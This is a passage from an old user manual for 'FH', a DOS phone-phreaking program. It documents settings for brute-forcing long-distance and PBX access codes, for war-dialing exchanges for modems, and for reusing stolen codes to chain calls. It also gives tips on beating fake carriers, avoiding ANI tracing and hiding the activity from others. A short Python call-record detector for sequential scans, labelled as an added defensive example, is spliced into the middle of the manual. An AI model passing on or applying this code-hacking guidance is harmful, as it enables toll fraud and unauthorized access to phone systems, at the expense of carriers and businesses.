             This is a three possibility option.  It can be Random (which
             picks codes to try COMPLETELY randomly (like the Lottery)),
             Sequential (this is as it sounds, if the code is 382, then next
             one tried will be 383, and then 384 and on like that), and Both
             (this one picks the codes in a sequential order, but the
             increment of the code is random).  So set it according to what
             you feel will do the best in your situation.

         L) Code Length:

             Oh good, an easy one.  This value is how many digits are in the
             code. If the Code Template is being used, this value is ignored.

         M) Code Template:

             This is easily the most complex and powerful option when it
             comes to code generation. This option overrides the code length
             (If this space is blank, codes will be generated according to the
             length entered, but if this option has ANYTHING entered, the code
             length is forgotten, and codes are created according to this
             template, so be careful when devising it.) It works like this.
             You make a string consisting of the digits 0 through 9, the X
             character, the comma (,), and the W character (for dialtone
             detection).  Any numerical digits (0-9) in the template will be
             present in EVERY code generated in the exact same position. Any
             commas in the template will not be in the place of a code digit,
             but will act as a pause when dialing the code (some systems have
             a second dial tone for the second half of the code, etc.) The X
             character signifies a variable digit. Entering a code template
             like 'XXXXX' would be exactly the same as setting the code length
             to 5 and leaving the template clear. The Hack modes apply here
             also. Some sample templates would be: 'XXXX,9,' would be useful
             if you want to try making a template to hack a PBX (instead of
             using the PBX mode of hacking) it would send a 4-digit code, wait
             for two seconds, send an outgoing 9 and wait for two more seconds
             before dialing the target. Or perhaps '1301XXXXXXX' would hack
             calling cards in the 301 area. The code template (except for the
             X's) is entered EXACTLY as the code is sent to the modem dialing
             command string, so be careful with it.

         N) Starting Code:

             This is the Code it will use the next time that this extender is
             used.  You can modify it in order to test out the delays that
             you are responsible for setting. By entering a good code here,
             so that you KNOW that you should make it all the way through to a
             CONNECT of some sort, you can see if you have timed everything
             accurately. This code should match the code template if you have
             set one (rare actually, most extenders are straightforward) and
             commas (,,,,) are legal in the code. If the extender depends on
             the code template, you must make the starting code match the
             template since the first code is not generated by the template.

         O) Code File:

             This is the name of the file that the good codes that are found
             for that particular Extender are stored in. We suggest you keep
             it at the default for the extender (the extender + .COD), but
             feel free to make it whatever the hell you want. If the extender
             dialed is part of a range, the code file will be set for each
             number in the range, and there is nothing you can do here to
             change it.

         P) Add valids:

             If you are real sure about this extender set this option to Yes
             and every good code found will be added onto the VALID.DAT file
             where good codes are kept. These codes are used to dial long
             distance extenders, and the timing here is critical. The target
             delay on the valid code must be set PERFECTLY for this to work
             and unless you have Dialtone Detect enabled on the extenders you
             dial Long Distance it is not recommended that you use this option.
             It does save you a little trouble though.

         Q) Note:

             Another easy one.  This is a little string of text that you can
             use like a small notepad for something about a particular
             Extender.  We use it for what the name of the service is, or who
             owns it.  Nothing real important, but handy, nevertheless.

         S) Flagged:

             This is an important one.  When hacking, the program randomly
             picks which extender to hack for the next pass.  If this is set
             to No, then it won't be included in the computer's choice of
             extenders.  Thus, if you don't want to hack a certain Extender,
             set this option to NO, otherwise, make sure it is Yes if you
             want to hack the Extender.  There is another option at the
             Utilities Menu that allows you to flag/un-flag every extender
             in the Extender file and it is much easier than flipping through
             each extender and changing it. When you A)dd a new extender this
             value defaults to NO and you must remember to flag it if you want
             to hack the extender immediately.

         T) Quit:

             This returns the cursor to the Command line, and you can
             continue on from there.

              Now that you have thoroughly learned all that, you must know
         that if you use the "A" command from the Command Line, you MUST
         enter the Area Code, Number, and Code Length before you can hack it
         (I mean be real, how can you hack an empty string? eh?).  You must
         also know about Deleting an Extender.  If an extender is no longer
         in service, or you just don't want it in your list anymore, then hit
         the proper arrow key, until you see that Extender on the screen. Now
         what you want to do is hit "D" for Delete Extender.  It will prompt
         you for a Yes or No, as to whether or not you want to delete it, and
         if you type "Y" it will be removed from the list, otherwise, it stays
         in the list.

                            Edit/Add/Delete Targets
                            -----------------------

              Edit Targets is the third option on the Utilities Menu.  When you
         choose it, it will clear the screen, and do just as it does for
         Edit Extenders, except that the window in the middle of the screen
         is smaller, because it doesn't store as much info as EXTENDER.DAT
         does.  But anyway, the Command Line is the same, and so are the
         Commands (duh huh!).  In this window you should see four things:

         A) Area Code:

             Simply put, this is the area code for the target in B.

         B) Number:

             This, of course, is the target.  Not much else you can say
             about it.

         C) Extra Delay:

             This is used in conjunction with Target Delay in the Edit
             Extender routine.  This value (in seconds) is added to the
             Target Delay time for whatever extender you are hacking.  Its
             main use is for LD Targets.  I mean if the target is Long
             Distance, it might take X more seconds for the call to get
             through, thus Extra Delay = X. If this option weren't around,
             it would be impossible to make all the extenders work with all
             the targets. The default value is zero and unless the target
             takes an unusually long time to answer (say it's in British
             Columbia or something) the value should remain at zero.

         D) Maximum Baud:

             This is the MAXIMUM baud at which the Target is capable of
             answering.  The program compares the Max Baud from the
             Configure Modem, Edit Extender, and Edit Target (this one),
             and will initialize and hack at the LOWEST of those speeds.
             I believe that to be self explanatory, so I won't explain.

         E) Minimum Baud:

             This is the MINIMUM baud to use with this Target. This is
             usually set to 300, but if you happen to find a target that
             won't connect at 300, set it to something higher. Remember,
             no matter what you set the bauds in the extenders and targets
             to, the program will never exceed the baud rate in the Modem
             Configuration.

         F) Quit Edit:

             This option just takes you back to the Edit Target Command Line.

              Just as you "A"dd and "D"elete in the Edit Extender routine,
         you do here.  It is all the same, so no need explaining it.  Now
         on to better things.

                             Edit/Add/Delete Valids
                             ----------------------

              Ok, this is the fourth option on the Utilities Menu.  Let's pick
         it.  You will see the all familiar clearing of the screen (but for
         the border), and the Command Line will appear at the top along
         with a small window.  This one is for Valid Codes.  These are used
         to dial an extender that is marked as Long Distance.  You may want
         to add a lot of these if you are doing some LD hacking.  The
         different fields are as follows:

         A) Number:

             Ok, this is a number to an extender.  That's all. Oh, use common
             sense, of course it must be local or an 800.

         B) Code:

             This is a VALID code for the above number. If a code template was
             used with this extender, use the proper commas or W's in the
             valid code.

         C) Dial Code First:

             Ok, this is another one of them Yes and No options.  It works just
             like the Dial Code First in the Edit Extender routine.  Read about
             it if you didn't bother already.

         D) Answer Delay:

             As you would think, this is the SAME as the Answer Delay in the
             Edit Extender routine, PLEASE look at it if you haven't already,
             or if you have forgotten already.  Thank you.

         E) Target delay:

             This is how many seconds to wait after dialing the target number
             (which in this case is the extender you are hacking) before
             dialing the code. Since most extenders time out if no code is
             dialed after a certain period of time, this length must be set
             VERY precisely. Dialtone detect is recommended.

                   *NOTE:  It is added to the answer delay for whatever
                           Extender you are using.  I actually recommend
                           you set this to 0 and modify the Answer Delay
                           in Edit Extenders, for the Extender you are
                           using.

         F) Quit Edit:

             This is like every other Quit that is in the program, it takes
             you back to the previous menu (in this case, back to the Command
             Line).

              Now as you find more good codes, you are going to want to put
         them in this list.  Well, that is rather simple, just type "A" for
         Add, and then input the information needed.  Also, the codes that
         you have put in there are going to go bad some time, so you will want
         to delete them.  This, once again, is rather simple.  Just type "D"
         at the Command Line, and hit "Y" when it asks for confirmation of the
         deleting.

                                 Flag Extenders
                                 --------------

              Ok, the next routine of the Utilities Menu is Flag Extenders.
         What this allows you to do is toggle the flag on each Extender,
         so that it will (or will not) be used while hacking.  The screen
         should clear, and a window will appear in the middle of the screen.
         This menu will have a list of the Extenders in your extender file,
         along with a "Quit" option, which returns you to the Utilities Menu.
         If you have a lot of Extenders, they won't fit on the screen, so it
         gives you more options.  They are "Next Screen" and "Previous Screen"
         and they will be up as options according to how many Extenders you
         have, and what 'screen' of them you are looking at.  You may use the
         PgUp and PgDn keys to choose the Next and Previous screen options
         instantly. But anyway, you move down until you are on top of the
         extender you want to flag (or un-flag as the case may be), and hit
         return.  If an arrow is pointed at the Extender, it is Flagged,
         otherwise it is not.

                   *NOTE: To save me some time, I'll mention right now that
                          the Exchange Flagging option behaves exactly like
                          this one, but it flags exchanges to scan instead of
                          extenders to hack.

                                Edit Exchanges
                                --------------

            This is where you enter in the exchanges you want to scan for
         carriers with the Scanner. The editing system here is very similar
         to the Extender Editing. I'll assume you all understand how CD
         scanners work and simply give you the explanation of the info you
         must fill in for each one:

         A) Area:

             This is the Area code for the range you are scanning. Enter
             it even if it isn't long distance, just so it looks good.

         B) Exchange:

             This is the first three numbers in any number dialed in this
             range. It is often referred to as the prefix.

         C) Start:

             Here is where you complete the phone number where you will
             start scanning. You enter the last four digits of the FIRST
             number you want to start dialing. This number will increase
             as the scanning progresses.

         D) Quit:

             This is the last four digits of the LAST number to dial.
             If you want to scan the numbers 301-321-0000 to 301-321-9999
             you would enter 301 in the Area (option A), 321 in the Exchange
             (option B), 0000 in Start (option C) and 9999 in Quit (this
             option). Is that confusing enough? Just wait.

         E) Dial Mode:

             This tells the program whether the exchange is long distance or
             local. Use the arrow keys to choose one or the other. If the
             number is local, only the exchange and last 4 digits (start) will
             be dialed to call the number. If it is long distance, then the
             call will first go through a service in the Valid Codes section,
             then dial the area code, exchange and last 4 digits.

         F) Timeout:

             This is a value in seconds that tells the Scanner how long to
             wait for a carrier after each dial. You can set this to anything
             you like, but I recommend about 12-15 seconds for local numbers
             and anywhere from 20 to 30 for long distance exchanges.

         G) Flag:

             Yes, you can flag exchanges the same way you flag extenders to
             hack. You may only want to scan one exchange at a time, or all
             or just a few. It's up to you. You can set the flag on or off
             at this menu, or use the Exchange Flagging (next option on the
             Utilities Menu) to flag any combination quickly.

         H) Quit Edit:

             Sends you back to the Utilities Menu, saving all changes made.
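
A defender's view of the sweep described under Edit Exchanges, as an added example that is not part of the original manual: one caller working through an exchange from Start to Quit in +1 steps, with short calls bounded by the Timeout, stands out in call detail records. The record layout, thresholds and sample data are assumptions constructed for illustration.

```python
from collections import defaultdict

# Constructed sample call records (not from the manual):
# (epoch seconds, calling number, dialed 10-digit number, call duration in seconds)
SAMPLE_CDR = (
    # One caller stepping through 301-321-0000..0039, one call every 20 seconds.
    [(1000 + 20 * i, "3015550100", f"301321{i:04d}", 14) for i in range(40)]
    # An ordinary caller: a few unrelated numbers, mixed call lengths.
    + [
        (1005, "3015550123", "3013214410", 310),
        (1900, "3015550123", "3013217731", 95),
        (2500, "3015550123", "3013210042", 12),
    ]
)


def find_sequential_scans(records, min_calls=25, max_duration=30,
                          min_seq_ratio=0.8, min_short_ratio=0.9):
    """Return sorted (caller, exchange, first, last, calls) tuples for suspected sweeps.

    A sweep is one caller dialing many numbers inside one area code + exchange,
    mostly in +1 steps, with most calls no longer than max_duration seconds.
    """
    by_pair = defaultdict(list)
    for ts, caller, dialed, duration in records:
        if len(dialed) != 10 or not dialed.isdigit():
            continue  # skip anything that is not a plain 10-digit number
        # Key on caller + area code and exchange; keep the last four digits.
        by_pair[(caller, dialed[:6])].append((ts, int(dialed[6:]), duration))

    findings = []
    for (caller, exchange), calls in by_pair.items():
        if len(calls) < min_calls:
            continue
        calls.sort()  # chronological order
        lines = [line for _, line, _ in calls]
        # Fraction of consecutive calls whose dialed number went up by exactly 1.
        steps = sum(1 for a, b in zip(lines, lines[1:]) if b - a == 1)
        seq_ratio = steps / max(len(lines) - 1, 1)
        # Fraction of calls short enough to look like a carrier-wait timeout.
        short_ratio = sum(1 for _, _, d in calls if d <= max_duration) / len(calls)
        if seq_ratio >= min_seq_ratio and short_ratio >= min_short_ratio:
            findings.append(
                (caller, exchange, f"{min(lines):04d}", f"{max(lines):04d}", len(calls))
            )
    return sorted(findings)


if __name__ == "__main__":
    for finding in find_sequential_scans(SAMPLE_CDR):
        print(finding)
```
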

                               Quit to Main Menu
                               -----------------

              Not only does this return to the Main Menu, so you can move
         on to better things, but if you edited something, and that routine
         didn't save it to disk, it is saved here (though most everything is
         saved the second you finish editing it).  Well, time to hit this
         option and return to the Main Menu to continue your tour.

                               The Hacking Screen
                               ------------------

            Here is an explanation of what all that shit on the hacking
         screen means.

         Status   :  This is what the program is doing, and what is going on
                     in response to it.

         Dialed   :  This is the number of attempts you have made since you
                     started.

         Success  :  The number of Good Codes found is here, along with your
                     ratio of Dialed vs. Successes (since started hacking).

         Baud     :  This is the baud the program is working at during the
                     call.  It is determined, as I said before, by the lowest
                     rate between the Modem Max, Extender Max, and Target Max.

         Hackmode :  This is just what the Code Generation is for the Extender
                     you are hacking at that moment.

         Extender :  Number of the Extender you are hacking on.

         Number   :  The phone number of the Extender.

         Note     :  This is the Extender Note we talked about earlier.

         Code     :  The code that it is trying is shown here.

         Attempts :  This is the total attempts you have made with the
                     extender you are hacking.

         Success  :  This success is for THE EXTENDER, not for all calls
                     that have been made since hacking has begun.

         Target   :  This is the phone number of the Target that it is using
                     to connect with.

              There are two others that you only see when you are hacking
         Long Distance, they are:

         Using :  One of the Extenders in the file VALID.DAT.

         Code  :  The Code that goes along with the above Extender.

              There are a few other things you should notice.  In the top
         right corner of the screen, there will be a timer that counts down
         the delays.  In the top left corner is the time and date (you should
         have noticed that by now).  Below the window there is a small list of
         commands.  They are just as they say.  Hit "S" to toggle the speaker
         on/off, hit the space bar to cycle onto the next pass, and hitting
         the escape key will abort hacking and return to the Main Menu. If you
         set the program to Quit to DOS, and aborted with a keypress, the Quit
         to DOS option will be ignored. That is really all there is to it,
         so let's have our closing remarks.

                                    Quit to DOS
                                    -----------

              If you pick this option, it will do as it says. After the
         Hacking Quit time has rolled around, the program will stop
         hacking, leave the Hacking Window, show you the credits, CLEAR the
         screen, and Quit to DOS where a batch file can regain control and
         dump your codes to the printer or whatever you want it to do. This
         option was put in because someone wanted to hack all night until 6 AM
         when his parents woke up, but didn't want the Hacker to be on the
         screen. They bitched that he left the computer on, but were none the
         wiser. Although this situation may not apply to you, the usefulness
         of having a batch file take over after running the Hacker justifies
         this option.

                                 Idiosyncrasies
                                 --------------

              Every program has its own 'quirks', so I will inform you of the
         ones this program has.  Well, I wouldn't exactly call them 'quirks';
         they are more like little unmentioned things that you can do, and tips.

                You can hit any arrow key to flip around most menus, unless it
                says otherwise.  You can also type the # (or letter) of the
                option, and it will be highlighted.

                Hitting ESC will move you back to the previous menu.

                Keypresses are buffered like hell, so if you think you
                didn't press it hard enough, wait a second or two to
                be sure before you punch that bad boy again. Sometimes you
                will be surprised to find yourself flipping wildly through
                the menus.

                If the Quit to DOS option is enabled on the Scanner or Hacker
                it will only drop to DOS if the program finishes Hacking or
                Scanning by means of the timer or (in the case of the Scanner)
                if the last number is dialed. Aborting the Hacker or Scanner
                with a keypress will disable the Quit to DOS option.

                Hitting the space bar in any of the edit menus will allow
                you to change that option (just as if you hit return).

                The Home, End, PgUp, and PgDn keys serve their familiar
                functions in most places. On the menus they jump from top
                to bottom and bottom to top, and when at the Edit Command Line
                they will jump to the first or last extender, target, valid
                or whatever. Try 'em out.

                If you need to change the .DAT files around, sometimes it
                is quickest just to delete the whole goddamn thing. (For
                example: you fucked around with the Response Codes, and
                forgot what to set them back to...) The program will create
                a new file if it finds one missing, and make the first
                record the default values for whatever the file is. (So if
                you deleted CONFIG.DAT, when you run the program again, it
                will say CREATING CONFIG.DAT, and you will have to go and
                configure for your modem. However the response codes will
                be set to their default values...) Don't be afraid to delete!

              WOW.  I could have sworn there were more little things. Well,
         if I forgot anything, I am sure you will figure 'em out. This is it,
         so go tear 'em up, eh?

TERMS

  Some of the terms you will encounter while you use FH may need some
explanation, so here's a small glossary of terms:

  CD

    Short for Carrier Detect. CD is what the Hacker uses to detect valid
    codes, and what the Scanner is scanning for.

  COMMAND LINE

    The DOS prompt where you type FH to run the program. The parameters
    you type after FH are used to set temporary values for the information
    in the Miscellaneous Parameters Menu.

  EXCHANGE

    The first 3 digits of a local phone number are referred to as the
    exchange. The scanner in FH scans 'exchanges.'

  EXTENDER

    A dialup for a LD service. This is the number people call to enter their
    access code in order to make a LD call.

  FAKE CARRIER

    Some extenders issue a fake answer tone to deter code hackers. This can
    often be overcome by hacking the extender at a different baud rate than
    the answer tone is designed for. The baud rate can be set individually
    for each extender, often enabling you to 'beat' fake carriers.

  I/O WINDOWS

    When hacking or scanning, the modem input and output can be displayed
    sequentially on the screen in two windows. The output to the modem is
    displayed in a 20 byte window on the upper left of screen, which scrolls
    from right to left as more output takes place. The input from the modem
    behaves in the same way, but on the upper right of the hacker/scanner
    screen.

  LD

    Long Distance. A number that is out of your local dialing area.

  PBX

    Private Business Exchange. A PBX is a phone system that is for the
    exclusive use of a business or institution. These are the kinds of
    phone systems where you have to dial a 9 (or something) to get an
    'outside line.' These systems apply to FH in two ways. The first is
    hacking from within a PBX system. FH is capable of doing this, by
    dialing the 'outside line' code before it dials the extender, valid code
    or exchange. PBX systems sometimes have a line with which you can call
    into the PBX system, enter a code, and have access to the 'outside line'
    without even being present at the PBX itself. The Code Template can
    be configured to hack PBX systems.

  TARGET

    When FH 'hacks' a code it dials an extender, enters a random code,
    and then dials a target number. The target number must be one that
    answers with a carrier. If FH gets a CONNECT message, the code dialed
    must be valid. (However, see FAKE CARRIER).

  VALID

    This is the term FH uses to refer to a 'good code' stored in the file
    VALIDS.DAT. FH uses these valid dialups/codes to hack long distance
    extenders, or to hack local extenders without the threat of ANI.

                            Documentation Written by
                        The Raving Lunatic and Hypnocosm

                           with Inspirational help by
                          Adrian Belew, and Sweet Leaf

                      Discipline is not an end in itself,
                         but merely means to an end.
                           Or something like that...

                       This has been a 2af presentation.